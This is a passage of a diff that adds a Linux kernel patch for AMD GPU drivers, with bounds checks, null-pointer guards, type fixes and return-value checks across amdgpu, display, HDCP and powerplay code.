+ 	return amdgpu_eeprom_xfer(i2c_adap, eeprom_addr, eeprom_buf, bytes,
+ 				  true);
+@@ -234,7 +234,7 @@ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 
+ int amdgpu_eeprom_write(struct i2c_adapter *i2c_adap,
+ 			u32 eeprom_addr, u8 *eeprom_buf,
+-			u16 bytes)
++			u32 bytes)
+ {
+ 	return amdgpu_eeprom_xfer(i2c_adap, eeprom_addr, eeprom_buf, bytes,
+ 				  false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
+index 6935adb2be1f1..8083b8253ef43 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
+@@ -28,10 +28,10 @@
+ 
+ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 		       u32 eeprom_addr, u8 *eeprom_buf,
+-		       u16 bytes);
++		       u32 bytes);
+ 
+ int amdgpu_eeprom_write(struct i2c_adapter *i2c_adap,
+ 			u32 eeprom_addr, u8 *eeprom_buf,
+-			u16 bytes);
++			u32 bytes);
+ 
+ #endif
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 8764ff7ed97e0..f8740ad08af41 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1297,6 +1297,9 @@ static void psp_xgmi_reflect_topology_info(struct psp_context *psp,
+ 	uint8_t dst_num_links = node_info.num_links;
+ 
+ 	hive = amdgpu_get_xgmi_hive(psp->adev);
++	if (WARN_ON(!hive))
++		return;
++
+ 	list_for_each_entry(mirror_adev, &hive->device_list, gmc.xgmi.head) {
+ 		struct psp_xgmi_topology_info *mirror_top_info;
+ 		int j;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+index 296b2d5976af7..cb73d06e1d38d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+@@ -324,7 +324,7 @@ int amdgpu_ring_init(struct amdgpu_device *adev, struct amdgpu_ring *ring,
+ 	ring->max_dw = max_dw;
+ 	ring->hw_prio = hw_prio;
+ 
+-	if (!ring->no_scheduler) {
++	if (!ring->no_scheduler && ring->funcs->type < AMDGPU_HW_IP_NUM) {
+ 		hw_ip = ring->funcs->type;
+ 		num_sched = &adev->gpu_sched[hw_ip][hw_prio].num_scheds;
+ 		adev->gpu_sched[hw_ip][hw_prio].sched[(*num_sched)++] =
+@@ -434,8 +434,9 @@ static ssize_t amdgpu_debugfs_ring_read(struct file *f, char __user *buf,
+ 					size_t size, loff_t *pos)
+ {
+ 	struct amdgpu_ring *ring = file_inode(f)->i_private;
+-	int r, i;
+ 	uint32_t value, result, early[3];
++	loff_t i;
++	int r;
+ 
+ 	if (*pos & 3 || size & 3)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index 5ee9211c503c4..af50e6ce39e17 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -604,7 +604,7 @@ static int amdgpu_virt_write_vf2pf_data(struct amdgpu_device *adev)
+ 	vf2pf_info->dummy_page_addr = (uint64_t)adev->dummy_page_addr;
+ 	vf2pf_info->checksum =
+ 		amd_sriov_msg_checksum(
+-		vf2pf_info, vf2pf_info->header.size, 0, 0);
++		vf2pf_info, sizeof(*vf2pf_info), 0, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/df_v1_7.c b/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
+index b991609f46c10..d4909ee97cd21 100644
+--- a/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
++++ b/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
+@@ -70,6 +70,8 @@ static u32 df_v1_7_get_hbm_channel_number(struct amdgpu_device *adev)
+ 	int fb_channel_number;
+ 
+ 	fb_channel_number = adev->df.funcs->get_fb_channel_number(adev);
++	if (fb_channel_number >= ARRAY_SIZE(df_v1_7_channel_number))
++		fb_channel_number = 0;
+ 
+ 	return df_v1_7_channel_number[fb_channel_number];
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
+index 19455a7259391..7679a4cd55c05 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
+@@ -384,7 +384,7 @@ static void nbio_v7_4_handle_ras_controller_intr_no_bifring(struct amdgpu_device
+ 		else
+ 			WREG32_SOC15(NBIO, 0, mmBIF_DOORBELL_INT_CNTL, bif_doorbell_intr_cntl);
+ 
+-		if (!ras->disable_ras_err_cnt_harvest) {
++		if (ras && !ras->disable_ras_err_cnt_harvest && obj) {
+ 			/*
+ 			 * clear error status after ras_controller_intr
+ 			 * according to hw team and count ue number
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+index a8671061a175a..bf90a64798675 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+@@ -43,8 +43,6 @@
+ #define CRAT_OEMTABLEID_LENGTH	8
+ #define CRAT_RESERVED_LENGTH	6
+ 
+-#define CRAT_OEMID_64BIT_MASK ((1ULL << (CRAT_OEMID_LENGTH * 8)) - 1)
+-
+ /* Compute Unit flags */
+ #define COMPUTE_UNIT_CPU	(1 << 0)  /* Create Virtual CRAT for CPU */
+ #define COMPUTE_UNIT_GPU	(1 << 1)  /* Create Virtual CRAT for GPU */
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 029916971bf66..d841200a405b5 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -972,8 +972,7 @@ static void kfd_update_system_properties(void)
+ 	dev = list_last_entry(&topology_device_list,
+ 			struct kfd_topology_device, list);
+ 	if (dev) {
+-		sys_props.platform_id =
+-			(*((uint64_t *)dev->oem_id)) & CRAT_OEMID_64BIT_MASK;
++		sys_props.platform_id = dev->oem_id64;
+ 		sys_props.platform_oem = *((uint64_t *)dev->oem_table_id);
+ 		sys_props.platform_rev = dev->oem_revision;
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+index 19283b8b16884..00a78c2ce6862 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+@@ -146,7 +146,10 @@ struct kfd_topology_device {
+ 	struct attribute		attr_gpuid;
+ 	struct attribute		attr_name;
+ 	struct attribute		attr_props;
+-	uint8_t				oem_id[CRAT_OEMID_LENGTH];
++	union {
++		uint8_t				oem_id[CRAT_OEMID_LENGTH];
++		uint64_t			oem_id64;
++	};
+ 	uint8_t				oem_table_id[CRAT_OEMTABLEID_LENGTH];
+ 	uint32_t			oem_revision;
+ };
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6189685af1fda..0be1a1149a3fe 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4359,7 +4359,10 @@ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ 
+ 	/* There is one primary plane per CRTC */
+ 	primary_planes = dm->dc->caps.max_streams;
+-	ASSERT(primary_planes <= AMDGPU_MAX_PLANES);
++	if (primary_planes > AMDGPU_MAX_PLANES) {
++		DRM_ERROR("DM: Plane nums out of 6 planes\n");
++		return -EINVAL;
++	}
+ 
+ 	/*
+ 	 * Initialize primary planes, implicit planes for legacy IOCTLS.
+@@ -8052,15 +8055,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				bundle->stream_update.vrr_infopacket =
+ 					&acrtc_state->stream->vrr_infopacket;
+ 		}
+-	} else if (cursor_update && acrtc_state->active_planes > 0 &&
+-		   acrtc_attach->base.state->event) {
+-		drm_crtc_vblank_get(pcrtc);
+-
++	} else if (cursor_update && acrtc_state->active_planes > 0) {
+ 		spin_lock_irqsave(&pcrtc->dev->event_lock, flags);
+-
+-		acrtc_attach->event = acrtc_attach->base.state->event;
+-		acrtc_attach->base.state->event = NULL;
+-
++		if (acrtc_attach->base.state->event) {
++			drm_crtc_vblank_get(pcrtc);
++			acrtc_attach->event = acrtc_attach->base.state->event;
++			acrtc_attach->base.state->event = NULL;
++		}
+ 		spin_unlock_irqrestore(&pcrtc->dev->event_lock, flags);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index 2c9a33c80c818..df18b4df1f2c1 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -49,7 +49,7 @@
+ 
+ #define AMDGPU_DM_MAX_NUM_EDP 2
+ 
+-#define AMDGPU_DMUB_NOTIFICATION_MAX 5
++#define AMDGPU_DMUB_NOTIFICATION_MAX 6
+ 
+ /*
+ #include "include/amdgpu_dal_power_if.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
+index ca6dfd2d7561f..35386011c56c8 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
+@@ -484,7 +484,8 @@ static void build_watermark_ranges(struct clk_bw_params *bw_params, struct pp_sm
+ 			ranges->reader_wm_sets[num_valid_sets].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
+ 
+ 			/* Modify previous watermark range to cover up to max */
+-			ranges->reader_wm_sets[num_valid_sets - 1].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
++			if (num_valid_sets > 0)
++				ranges->reader_wm_sets[num_valid_sets - 1].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
+ 		}
+ 		num_valid_sets++;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index f415733f1a979..d7bca680805d3 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1265,6 +1265,7 @@ struct dc *dc_create(const struct dc_init_data *init_params)
+ 		return NULL;
+ 
+ 	if (init_params->dce_environment == DCE_ENV_VIRTUAL_HW) {
++		dc->caps.linear_pitch_alignment = 64;
+ 		if (!dc_construct_ctx(dc, init_params))
+ 			goto destruct_dc;
+ 	} else {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index 83898e46bcadf..29400db42bb2d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -3629,6 +3629,9 @@ void resource_build_bit_depth_reduction_params(struct dc_stream_state *stream,
+ 
+ enum dc_status dc_validate_stream(struct dc *dc, struct dc_stream_state *stream)
+ {
++	if (dc == NULL || stream == NULL)
++		return DC_ERROR_UNEXPECTED;
++
+ 	struct dc_link *link = stream->link;
+ 	struct timing_generator *tg = dc->res_pool->timing_generators[0];
+ 	enum dc_status res = DC_OK;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
+index 994fb732a7cb7..a0d437f0ce2ba 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
+@@ -690,6 +690,9 @@ static void wbscl_set_scaler_filter(
+ 	int pair;
+ 	uint16_t odd_coef, even_coef;
+ 
++	if (!filter)
++		return;
++
+ 	for (phase = 0; phase < (NUM_PHASES / 2 + 1); phase++) {
+ 		for (pair = 0; pair < tap_pairs; pair++) {
+ 			even_coef = filter[phase * taps + 2 * pair];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c b/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
+index e73f089c84bb6..ebd7ed1b9a3cd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
+@@ -1453,10 +1453,9 @@ void dcn_bw_update_from_pplib_fclks(
+ 	ASSERT(fclks->num_levels);
+ 
+ 	vmin0p65_idx = 0;
+-	vmid0p72_idx = fclks->num_levels -
+-		(fclks->num_levels > 2 ? 3 : (fclks->num_levels > 1 ? 2 : 1));
+-	vnom0p8_idx = fclks->num_levels - (fclks->num_levels > 1 ? 2 : 1);
+-	vmax0p9_idx = fclks->num_levels - 1;
++	vmid0p72_idx = fclks->num_levels > 2 ? fclks->num_levels - 3 : 0;
++	vnom0p8_idx = fclks->num_levels > 1 ? fclks->num_levels - 2 : 0;
++	vmax0p9_idx = fclks->num_levels > 0 ? fclks->num_levels - 1 : 0;
+ 
+ 	dc->dcn_soc->fabric_and_dram_bandwidth_vmin0p65 =
+ 		32 * (fclks->data[vmin0p65_idx].clocks_in_khz / 1000.0) / 1000.0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+index 1070cf8701960..b2ad56c459ba6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+@@ -1099,8 +1099,13 @@ void ModeSupportAndSystemConfiguration(struct display_mode_lib *mode_lib)
+ 
+ 	// Total Available Pipes Support Check
+ 	for (k = 0; k < mode_lib->vba.NumberOfActivePlanes; ++k) {
+-		total_pipes += mode_lib->vba.DPPPerPlane[k];
+ 		pipe_idx = get_pipe_idx(mode_lib, k);
++		if (pipe_idx == -1) {
++			ASSERT(0);
++			continue; // skip inactive planes
++		}
++		total_pipes += mode_lib->vba.DPPPerPlane[k];
++
+ 		if (mode_lib->vba.cache_pipes[pipe_idx].clks_cfg.dppclk_mhz > 0.0)
+ 			mode_lib->vba.DPPCLK[k] = mode_lib->vba.cache_pipes[pipe_idx].clks_cfg.dppclk_mhz;
+ 		else
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c b/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
+index 3ede6e02c3a78..f2037d78f71ab 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
+@@ -56,7 +56,7 @@ struct gpio_service *dal_gpio_service_create(
+ 	struct dc_context *ctx)
+ {
+ 	struct gpio_service *service;
+-	uint32_t index_of_id;
++	int32_t index_of_id;
+ 
+ 	service = kzalloc(sizeof(struct gpio_service), GFP_KERNEL);
+ 
+@@ -112,7 +112,7 @@ struct gpio_service *dal_gpio_service_create(
+ 	return service;
+ 
+ failure_2:
+-	while (index_of_id) {
++	while (index_of_id > 0) {
+ 		--index_of_id;
+ 		kfree(service->busyness[index_of_id]);
+ 	}
+@@ -239,6 +239,9 @@ static bool is_pin_busy(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return false;
++
+ 	return service->busyness[id][en];
+ }
+ 
+@@ -247,6 +250,9 @@ static void set_pin_busy(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return;
++
+ 	service->busyness[id][en] = true;
+ }
+ 
+@@ -255,6 +261,9 @@ static void set_pin_free(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return;
++
+ 	service->busyness[id][en] = false;
+ }
+ 
+@@ -263,7 +272,7 @@ enum gpio_result dal_gpio_service_lock(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
+-	if (!service->busyness[id]) {
++	if (id != GPIO_ID_UNKNOWN && !service->busyness[id]) {
+ 		ASSERT_CRITICAL(false);
+ 		return GPIO_RESULT_OPEN_FAILED;
+ 	}
+@@ -277,7 +286,7 @@ enum gpio_result dal_gpio_service_unlock(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
+-	if (!service->busyness[id]) {
++	if (id != GPIO_ID_UNKNOWN && !service->busyness[id]) {
+ 		ASSERT_CRITICAL(false);
+ 		return GPIO_RESULT_OPEN_FAILED;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c b/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
+index 4233955e3c47b..c9851492ec84a 100644
+--- a/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
++++ b/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
+@@ -131,13 +131,21 @@ static bool hdmi_14_process_transaction(
+ 	const uint8_t hdcp_i2c_addr_link_primary = 0x3a; /* 0x74 >> 1*/
+ 	const uint8_t hdcp_i2c_addr_link_secondary = 0x3b; /* 0x76 >> 1*/
+ 	struct i2c_command i2c_command;
+-	uint8_t offset = hdcp_i2c_offsets[message_info->msg_id];
++	uint8_t offset;
+ 	struct i2c_payload i2c_payloads[] = {
+-		{ true, 0, 1, &offset },
++		{ true, 0, 1, 0 },
+ 		/* actual hdcp payload, will be filled later, zeroed for now*/
+ 		{ 0 }
+ 	};
+ 
++	if (message_info->msg_id == HDCP_MESSAGE_ID_INVALID) {
++		DC_LOG_ERROR("%s: Invalid message_info msg_id - %d\n", __func__, message_info->msg_id);
++		return false;
++	}
++
++	offset = hdcp_i2c_offsets[message_info->msg_id];
++	i2c_payloads[0].data = &offset;
++
+ 	switch (message_info->link) {
+ 	case HDCP_LINK_SECONDARY:
+ 		i2c_payloads[0].address = hdcp_i2c_addr_link_secondary;
+@@ -311,6 +319,11 @@ static bool dp_11_process_transaction(
+ 	struct dc_link *link,
+ 	struct hdcp_protection_message *message_info)
+ {
++	if (message_info->msg_id == HDCP_MESSAGE_ID_INVALID) {
++		DC_LOG_ERROR("%s: Invalid message_info msg_id - %d\n", __func__, message_info->msg_id);
++		return false;
++	}
++
+ 	return dpcd_access_helper(
+ 		link,
+ 		message_info->length,
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+index 8e9caae7c9559..1b2df97226a3f 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+@@ -156,11 +156,16 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
+-	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID ||
++		msg_id >= MOD_HDCP_MESSAGE_ID_MAX)
+ 		return MOD_HDCP_STATUS_DDC_FAILURE;
+-	}
+ 
+ 	if (is_dp_hdcp(hdcp)) {
++		int num_dpcd_addrs = sizeof(hdcp_dpcd_addrs) /
++			sizeof(hdcp_dpcd_addrs[0]);
++		if (msg_id >= num_dpcd_addrs)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+ 			success = hdcp->config.ddc.funcs.read_dpcd(hdcp->config.ddc.handle,
+@@ -175,6 +180,11 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 			data_offset += cur_size;
+ 		}
+ 	} else {
++		int num_i2c_offsets = sizeof(hdcp_i2c_offsets) /
++			sizeof(hdcp_i2c_offsets[0]);
++		if (msg_id >= num_i2c_offsets)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		success = hdcp->config.ddc.funcs.read_i2c(
+ 				hdcp->config.ddc.handle,
+ 				HDCP_I2C_ADDR,
+@@ -219,11 +229,16 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
+-	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID ||
++		msg_id >= MOD_HDCP_MESSAGE_ID_MAX)
+ 		return MOD_HDCP_STATUS_DDC_FAILURE;
+-	}
+ 
+ 	if (is_dp_hdcp(hdcp)) {
++		int num_dpcd_addrs = sizeof(hdcp_dpcd_addrs) /
++			sizeof(hdcp_dpcd_addrs[0]);
++		if (msg_id >= num_dpcd_addrs)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+ 			success = hdcp->config.ddc.funcs.write_dpcd(
+@@ -239,6 +254,11 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 			data_offset += cur_size;
+ 		}
+ 	} else {
++		int num_i2c_offsets = sizeof(hdcp_i2c_offsets) /
++			sizeof(hdcp_i2c_offsets[0]);
++		if (msg_id >= num_i2c_offsets)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		hdcp->buf[0] = hdcp_i2c_offsets[msg_id];
+ 		memmove(&hdcp->buf[1], buf, buf_len);
+ 		success = hdcp->config.ddc.funcs.write_i2c(
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index f3668911a88fd..eae4b4826f043 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -99,7 +99,7 @@ static void pp_swctf_delayed_work_handler(struct work_struct *work)
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	struct amdgpu_dpm_thermal *range =
+ 				&adev->pm.dpm.thermal;
+-	uint32_t gpu_temperature, size;
++	uint32_t gpu_temperature, size = sizeof(gpu_temperature);
+ 	int ret;
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index f4bd8e9357e22..18f00038d8441 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -30,9 +30,8 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ {
+ 	int result;
+ 	unsigned int i;
+-	unsigned int table_entries;
+ 	struct pp_power_state *state;
+-	int size;
++	int size, table_entries;
+ 
+ 	if (hwmgr->hwmgr_func->get_num_of_pp_table_entries == NULL)
+ 		return 0;
+@@ -40,15 +39,19 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ 	if (hwmgr->hwmgr_func->get_power_state_size == NULL)
+ 		return 0;
+ 
+-	hwmgr->num_ps = table_entries = hwmgr->hwmgr_func->get_num_of_pp_table_entries(hwmgr);
++	table_entries = hwmgr->hwmgr_func->get_num_of_pp_table_entries(hwmgr);
+ 
+-	hwmgr->ps_size = size = hwmgr->hwmgr_func->get_power_state_size(hwmgr) +
++	size = hwmgr->hwmgr_func->get_power_state_size(hwmgr) +
+ 					  sizeof(struct pp_power_state);
+ 
+-	if (table_entries == 0 || size == 0) {
++	if (table_entries <= 0 || size == 0) {
+ 		pr_warn("Please check whether power state management is supported on this asic\n");
++		hwmgr->num_ps = 0;
++		hwmgr->ps_size = 0;
+ 		return 0;
+ 	}
++	hwmgr->num_ps = table_entries;
++	hwmgr->ps_size = size;
+ 
+ 	hwmgr->ps = kcalloc(table_entries, size, GFP_KERNEL);
+ 	if (hwmgr->ps == NULL)
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
+index f503e61faa600..cc3b62f733941 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
+@@ -73,8 +73,9 @@ static int atomctrl_retrieve_ac_timing(
+ 					j++;
+ 				} else if ((table->mc_reg_address[i].uc_pre_reg_data &
+ 							LOW_NIBBLE_MASK) == DATA_EQU_PREV) {
+-					table->mc_reg_table_entry[num_ranges].mc_data[i] =
+-						table->mc_reg_table_entry[num_ranges].mc_data[i-1];
++					if (i)
++						table->mc_reg_table_entry[num_ranges].mc_data[i] =
++							table->mc_reg_table_entry[num_ranges].mc_data[i-1];
+ 				}
+ 			}
+ 			num_ranges++;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+index 86d6e88c73862..4f3488f4e0d05 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+@@ -1036,7 +1036,9 @@ static int smu10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 
+ 	switch (type) {
+ 	case PP_SCLK:
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetGfxclkFrequency, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetGfxclkFrequency, &now);
++		if (ret)
++			return ret;
+ 
+ 	/* driver only know min/max gfx_clk, Add level 1 for all other gfx clks */
+ 		if (now == data->gfx_max_freq_limit/100)
+@@ -1057,7 +1059,9 @@ static int smu10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 					i == 2 ? "*" : "");
+ 		break;
+ 	case PP_MCLK:
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetFclkFrequency, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetFclkFrequency, &now);
++		if (ret)
++			return ret;
+ 
+ 		for (i = 0; i < mclk_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -1550,7 +1554,10 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 		}
+ 
+ 		if (input[0] == 0) {
+-			smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++			ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++			if (ret)
++				return ret;
++
+ 			if (input[1] < min_freq) {
+ 				pr_err("Fine grain setting minimum sclk (%ld) MHz is less than the minimum allowed (%d) MHz\n",
+ 					input[1], min_freq);
+@@ -1558,7 +1565,10 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 			}
+ 			smu10_data->gfx_actual_soft_min_freq = input[1];
+ 		} else if (input[0] == 1) {
+-			smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++			ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++			if (ret)
++				return ret;
++
+ 			if (input[1] > max_freq) {
+ 				pr_err("Fine grain setting maximum sclk (%ld) MHz is greater than the maximum allowed (%d) MHz\n",
+ 					input[1], max_freq);
+@@ -1573,10 +1583,15 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 			pr_err("Input parameter number not correct\n");
+ 			return -EINVAL;
+ 		}
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
+-
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++		if (ret)
++			return ret;
+ 		smu10_data->gfx_actual_soft_min_freq = min_freq;
++
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++		if (ret)
++			return ret;
++
+ 		smu10_data->gfx_actual_soft_max_freq = max_freq;
